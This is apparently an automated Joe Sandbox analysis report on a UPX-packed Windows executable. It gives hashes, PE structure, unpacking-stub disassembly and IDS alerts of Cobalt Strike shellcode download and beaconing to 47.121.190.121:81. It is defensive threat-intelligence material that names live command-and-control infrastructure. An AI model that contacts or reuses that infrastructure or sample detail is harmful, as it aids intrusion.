47.121.190.121	unknown	China		37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587089
Start date and time:	2025-01-09 23:06:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	THsSNYblMw.exe renamed because original name is a hash value
Original Sample Name:	16c39b54b46a69ca6950ffa93b7dda3f.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/0@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 18 Number of non-executed functions: 142
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
VT rate limit hit for: THsSNYblMw.exe

Simulations

Behavior and APIs

Time	Type	Description
17:06:58	API Interceptor	16347317x Sleep call for process: THsSNYblMw.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
47.121.190.121	k2vUsu5VZ5.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	47.121.190.121:81/dot.gif

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	Fantazy.sh4.elf	Get hash	malicious	Unknown	Browse	139.242.78.130
	Fantazy.ppc.elf	Get hash	malicious	Unknown	Browse	47.114.96.229
	Fantazy.mips.elf	Get hash	malicious	Unknown	Browse	8.140.140.254
	k2vUsu5VZ5.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	47.121.190.121
	Fantazy.spc.elf	Get hash	malicious	Unknown	Browse	8.167.197.133
	sora.mpsl.elf	Get hash	malicious	Unknown	Browse	8.182.192.34
	sora.m68k.elf	Get hash	malicious	Unknown	Browse	47.116.180.218
	sora.arm.elf	Get hash	malicious	Unknown	Browse	223.6.159.231
	Benefit_401k_2025_Enrollment.pdf	Get hash	malicious	Unknown	Browse	203.119.157.14
	arm.elf	Get hash	malicious	Mirai	Browse	8.145.236.38

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.475000794760806
TrID:	UPX compressed Win32 Executable (30571/9) 65.57% Win64 Executable (generic) (12005/4) 25.75% Generic Win/DOS Executable (2004/3) 4.30% DOS Executable Generic (2002/1) 4.29% VXD Driver (31/22) 0.07%
File name:	THsSNYblMw.exe
File size:	9'728 bytes
MD5:	16c39b54b46a69ca6950ffa93b7dda3f
SHA1:	1e34c89d60c9a0fdd55d5705f4e793ea11b20427
SHA256:	ef75893bff5dea81a18ba2927a608c22eefa5344042076a43cff2932bacd5787
SHA512:	55224692fac659b9969324a7dc4a3efb02652e71dc6dda8fe74fcc8e91be179bf2f44c7089951a236b3d00e0a0125cd9c1f76fdff3182c9d8427f90f037fc7b6
SSDEEP:	192:scRqd3PcxUjboojUf43iaK5lgKv/gu8t4zu9uA9wqWkS:sbbjboojQXGKvou8tkupzS
TLSH:	BB12AF9F12A881BED1CDC934DBB9A44E20FF2C7C0B894E3767C013AE6D587785A58120
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./....".0.......... .........@............................................... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40df20
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:	0x40e14a
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	9aebf3da4677af9275c461261e5abde3

Entrypoint Preview

Instruction
push ebx
push esi
push edi
push ebp
dec eax
lea esi, dword ptr [FFFFE0FAh]
dec eax
lea edi, dword ptr [esi-0000B025h]
push edi
xor ebx, ebx
xor ecx, ecx
dec eax
or ebp, FFFFFFFFh
call 00007FBC708F61A5h
add ebx, ebx
je 00007FBC708F6154h
rep ret
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
rep ret
dec eax
lea eax, dword ptr [edi+ebp]
cmp ecx, 05h
mov dl, byte ptr [eax]
jbe 00007FBC708F6173h
dec eax
cmp ebp, FFFFFFFCh
jnbe 00007FBC708F616Dh
sub ecx, 04h
mov edx, dword ptr [eax]
dec eax
add eax, 04h
sub ecx, 04h
mov dword ptr [edi], edx
dec eax
lea edi, dword ptr [edi+04h]
jnc 00007FBC708F6141h
add ecx, 04h
mov dl, byte ptr [eax]
je 00007FBC708F6162h
dec eax
inc eax
mov byte ptr [edi], dl
sub ecx, 01h
mov dl, byte ptr [eax]
dec eax
lea edi, dword ptr [edi+01h]
jne 00007FBC708F6142h
rep ret
cld
inc ecx
pop ebx
jmp 00007FBC708F615Ah
dec eax
inc esi
mov byte ptr [edi], dl
dec eax
inc edi
mov dl, byte ptr [esi]
add ebx, ebx
jne 00007FBC708F615Ch
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
jc 00007FBC708F6138h
lea eax, dword ptr [ecx+01h]
inc ecx
call ebx
adc eax, eax
add ebx, ebx
jne 00007FBC708F615Ch
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
jnc 00007FBC708F613Dh
sub eax, 03h
jc 00007FBC708F6165h
shl eax, 08h
movzx edx, dl
or eax, edx
dec eax
inc esi
xor eax, FFFFFFFFh
je 00007FBC708F618Ch
dec eax
arpl ax, bp
lea eax, dword ptr [ecx+01h]
inc ecx
call ebx
adc ecx, ecx

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf000	0xd0	UPX2
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x6000	0x2b8	UPX0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xe170	0x28	UPX1
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0xb000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1	0xc000	0x3000	0x2200	6146d5b83710d8594e4abc5c0fddd67f	False	0.9693244485294118	data	7.7915865364045045	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX2	0xf000	0x1000	0x200	922c9b618a0dc7bae26c062b86d2ed87	False	0.248046875	data	1.575165572176159	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
KERNEL32.DLL	LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
msvcrt.dll	exit

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-09T23:07:00.873845+0100	2035442	ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1	1	47.121.190.121	81	192.168.2.4	49730	TCP
2025-01-09T23:07:04.635223+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49731	47.121.190.121	81	TCP
2025-01-09T23:07:05.715364+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49732	47.121.190.121	81	TCP
2025-01-09T23:07:06.961348+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49733	47.121.190.121	81	TCP
2025-01-09T23:07:08.025242+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49734	47.121.190.121	81	TCP
2025-01-09T23:07:09.112047+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49735	47.121.190.121	81	TCP
2025-01-09T23:07:10.188069+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49736	47.121.190.121	81	TCP
2025-01-09T23:07:11.235516+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49737	47.121.190.121	81	TCP
2025-01-09T23:07:12.299871+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49738	47.121.190.121	81	TCP
2025-01-09T23:07:13.522816+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49739	47.121.190.121	81	TCP
2025-01-09T23:07:14.573406+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49740	47.121.190.121	81	TCP
2025-01-09T23:07:15.719039+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49741	47.121.190.121	81	TCP
2025-01-09T23:07:16.795211+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49743	47.121.190.121	81	TCP
2025-01-09T23:07:17.879867+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49747	47.121.190.121	81	TCP
2025-01-09T23:07:18.937068+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49749	47.121.190.121	81	TCP
2025-01-09T23:07:19.996500+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49751	47.121.190.121	81	TCP
2025-01-09T23:07:21.066023+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49752	47.121.190.121	81	TCP
2025-01-09T23:07:22.114665+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49753	47.121.190.121	81	TCP
2025-01-09T23:07:23.193205+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49754	47.121.190.121	81	TCP
2025-01-09T23:07:24.239252+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49755	47.121.190.121	81	TCP
2025-01-09T23:07:25.283377+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49756	47.121.190.121	81	TCP
2025-01-09T23:07:26.363516+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49757	47.121.190.121	81	TCP
2025-01-09T23:07:27.462058+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49758	47.121.190.121	81	TCP
2025-01-09T23:07:28.531254+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49759	47.121.190.121	81	TCP
2025-01-09T23:07:29.594575+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49760	47.121.190.121	81	TCP
2025-01-09T23:07:30.651421+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49761	47.121.190.121	81	TCP
2025-01-09T23:07:31.733396+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49762	47.121.190.121	81	TCP
2025-01-09T23:07:32.823666+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49763	47.121.190.121	81	TCP
2025-01-09T23:07:34.699446+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49764	47.121.190.121	81	TCP
2025-01-09T23:07:35.823795+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49765	47.121.190.121	81	TCP
2025-01-09T23:07:36.904160+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49766	47.121.190.121	81	TCP
2025-01-09T23:07:37.954456+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49767	47.121.190.121	81	TCP
2025-01-09T23:07:39.009812+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49768	47.121.190.121	81	TCP
2025-01-09T23:07:40.069644+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49769	47.121.190.121	81	TCP
2025-01-09T23:07:41.239880+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49770	47.121.190.121	81	TCP
2025-01-09T23:07:42.298132+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49771	47.121.190.121	81	TCP
2025-01-09T23:07:43.354796+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49772	47.121.190.121	81	TCP
2025-01-09T23:07:44.428789+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49773	47.121.190.121	81	TCP
2025-01-09T23:07:45.505750+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49774	47.121.190.121	81	TCP
2025-01-09T23:07:46.595841+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49775	47.121.190.121	81	TCP
2025-01-09T23:07:47.676742+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49776	47.121.190.121	81	TCP
2025-01-09T23:07:48.736822+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49777	47.121.190.121	81	TCP
2025-01-09T23:07:49.843678+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49778	47.121.190.121	81	TCP
2025-01-09T23:07:50.958534+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49779	47.121.190.121	81	TCP
2025-01-09T23:07:52.036441+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49780	47.121.190.121	81	TCP
2025-01-09T23:07:53.106341+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49781	47.121.190.121	81	TCP
2025-01-09T23:07:54.162834+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49782	47.121.190.121	81	TCP
2025-01-09T23:07:55.246288+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49784	47.121.190.121	81	TCP
2025-01-09T23:07:59.704018+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49786	47.121.190.121	81	TCP
2025-01-09T23:08:00.819303+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49812	47.121.190.121	81	TCP
2025-01-09T23:08:01.886869+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49818	47.121.190.121	81	TCP
2025-01-09T23:08:03.011918+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49825	47.121.190.121	81	TCP
2025-01-09T23:08:04.069128+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49835	47.121.190.121	81	TCP
2025-01-09T23:08:05.132016+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49841	47.121.190.121	81	TCP
2025-01-09T23:08:06.217497+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49850	47.121.190.121	81	TCP
2025-01-09T23:08:07.289304+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49857	47.121.190.121	81	TCP
2025-01-09T23:08:08.357258+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49864	47.121.190.121	81	TCP
2025-01-09T23:08:12.425546+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49871	47.121.190.121	81	TCP
2025-01-09T23:08:13.508031+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49898	47.121.190.121	81	TCP
2025-01-09T23:08:14.642770+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49906	47.121.190.121	81	TCP
2025-01-09T23:08:15.695114+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49915	47.121.190.121	81	TCP
2025-01-09T23:08:16.763535+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49922	47.121.190.121	81	TCP
2025-01-09T23:08:17.823582+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49928	47.121.190.121	81	TCP
2025-01-09T23:08:18.882359+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49936	47.121.190.121	81	TCP
2025-01-09T23:08:19.957964+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49942	47.121.190.121	81	TCP
2025-01-09T23:08:21.012535+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49952	47.121.190.121	81	TCP
2025-01-09T23:08:22.085328+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49959	47.121.190.121	81	TCP
2025-01-09T23:08:23.145392+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49967	47.121.190.121	81	TCP
2025-01-09T23:08:24.207380+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49976	47.121.190.121	81	TCP
2025-01-09T23:08:25.305702+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49982	47.121.190.121	81	TCP
2025-01-09T23:08:26.543299+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49993	47.121.190.121	81	TCP
2025-01-09T23:08:27.603685+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49999	47.121.190.121	81	TCP
2025-01-09T23:08:28.670084+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50006	47.121.190.121	81	TCP
2025-01-09T23:08:29.765034+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50013	47.121.190.121	81	TCP
2025-01-09T23:08:30.945555+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50020	47.121.190.121	81	TCP
2025-01-09T23:08:32.010589+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50026	47.121.190.121	81	TCP
2025-01-09T23:08:33.098788+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50035	47.121.190.121	81	TCP
2025-01-09T23:08:34.161958+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50041	47.121.190.121	81	TCP
2025-01-09T23:08:35.276091+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50050	47.121.190.121	81	TCP
2025-01-09T23:08:36.395230+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50058	47.121.190.121	81	TCP
2025-01-09T23:08:37.566627+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50066	47.121.190.121	81	TCP
2025-01-09T23:08:38.651423+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50075	47.121.190.121	81	TCP
2025-01-09T23:08:39.745896+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50082	47.121.190.121	81	TCP
2025-01-09T23:08:40.859068+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50085	47.121.190.121	81	TCP
2025-01-09T23:08:41.934344+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50086	47.121.190.121	81	TCP
2025-01-09T23:08:43.047311+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50087	47.121.190.121	81	TCP
2025-01-09T23:08:44.105737+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50088	47.121.190.121	81	TCP
2025-01-09T23:08:45.247245+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50089	47.121.190.121	81	TCP
2025-01-09T23:08:46.374708+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50090	47.121.190.121	81	TCP
2025-01-09T23:08:47.489114+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50091	47.121.190.121	81	TCP
2025-01-09T23:08:48.603602+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50092	47.121.190.121	81	TCP
2025-01-09T23:08:49.750000+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50093	47.121.190.121	81	TCP
2025-01-09T23:08:50.826905+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50094	47.121.190.121	81	TCP
2025-01-09T23:08:51.897079+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50095	47.121.190.121	81	TCP
2025-01-09T23:08:52.992887+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50096	47.121.190.121	81	TCP
2025-01-09T23:08:54.053626+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50097	47.121.190.121	81	TCP
2025-01-09T23:08:55.109529+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50098	47.121.190.121	81	TCP
2025-01-09T23:08:56.176884+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50099	47.121.190.121	81	TCP
2025-01-09T23:08:57.253759+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50100	47.121.190.121	81	TCP
2025-01-09T23:08:58.318812+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50101	47.121.190.121	81	TCP
2025-01-09T23:08:59.388457+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50102	47.121.190.121	81	TCP
2025-01-09T23:09:00.458663+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50103	47.121.190.121	81	TCP
2025-01-09T23:09:01.555646+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50104	47.121.190.121	81	TCP
2025-01-09T23:09:02.652276+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50105	47.121.190.121	81	TCP
2025-01-09T23:09:03.723448+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50106	47.121.190.121	81	TCP
2025-01-09T23:09:04.779411+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50107	47.121.190.121	81	TCP
2025-01-09T23:09:05.863235+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50108	47.121.190.121	81	TCP
2025-01-09T23:09:06.941054+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50109	47.121.190.121	81	TCP
2025-01-09T23:09:07.999618+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50110	47.121.190.121	81	TCP
2025-01-09T23:09:09.078171+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50111	47.121.190.121	81	TCP
2025-01-09T23:09:10.157383+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50112	47.121.190.121	81	TCP
2025-01-09T23:09:11.227208+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50113	47.121.190.121	81	TCP
2025-01-09T23:09:12.325180+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50114	47.121.190.121	81	TCP
2025-01-09T23:09:13.392270+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50115	47.121.190.121	81	TCP
2025-01-09T23:09:14.447803+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50116	47.121.190.121	81	TCP
2025-01-09T23:09:15.547290+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50117	47.121.190.121	81	TCP
2025-01-09T23:09:16.610919+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50118	47.121.190.121	81	TCP
2025-01-09T23:09:17.671540+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50119	47.121.190.121	81	TCP
2025-01-09T23:09:18.747791+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50120	47.121.190.121	81	TCP
2025-01-09T23:09:19.847375+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50121	47.121.190.121	81	TCP
2025-01-09T23:09:23.968270+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50122	47.121.190.121	81	TCP
2025-01-09T23:09:25.018106+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50123	47.121.190.121	81	TCP
2025-01-09T23:09:26.069300+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50124	47.121.190.121	81	TCP
2025-01-09T23:09:27.124761+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50125	47.121.190.121	81	TCP
2025-01-09T23:09:28.209149+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50126	47.121.190.121	81	TCP
2025-01-09T23:09:29.284759+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50127	47.121.190.121	81	TCP
2025-01-09T23:09:30.368000+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50128	47.121.190.121	81	TCP
2025-01-09T23:09:31.464734+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50129	47.121.190.121	81	TCP
2025-01-09T23:09:32.539687+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50130	47.121.190.121	81	TCP
2025-01-09T23:09:33.600675+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50131	47.121.190.121	81	TCP
2025-01-09T23:09:34.660226+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50132	47.121.190.121	81	TCP
2025-01-09T23:09:35.732148+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50133	47.121.190.121	81	TCP
2025-01-09T23:09:36.780480+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50134	47.121.190.121	81	TCP
2025-01-09T23:09:38.038491+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50135	47.121.190.121	81	TCP
2025-01-09T23:09:39.082770+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50136	47.121.190.121	81	TCP
2025-01-09T23:09:40.165631+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50137	47.121.190.121	81	TCP
2025-01-09T23:09:41.265275+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50138	47.121.190.121	81	TCP
2025-01-09T23:09:42.315792+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50139	47.121.190.121	81	TCP
2025-01-09T23:09:43.375472+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50140	47.121.190.121	81	TCP
2025-01-09T23:09:44.465869+0100	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50141	47.121.190.121	81	TCP
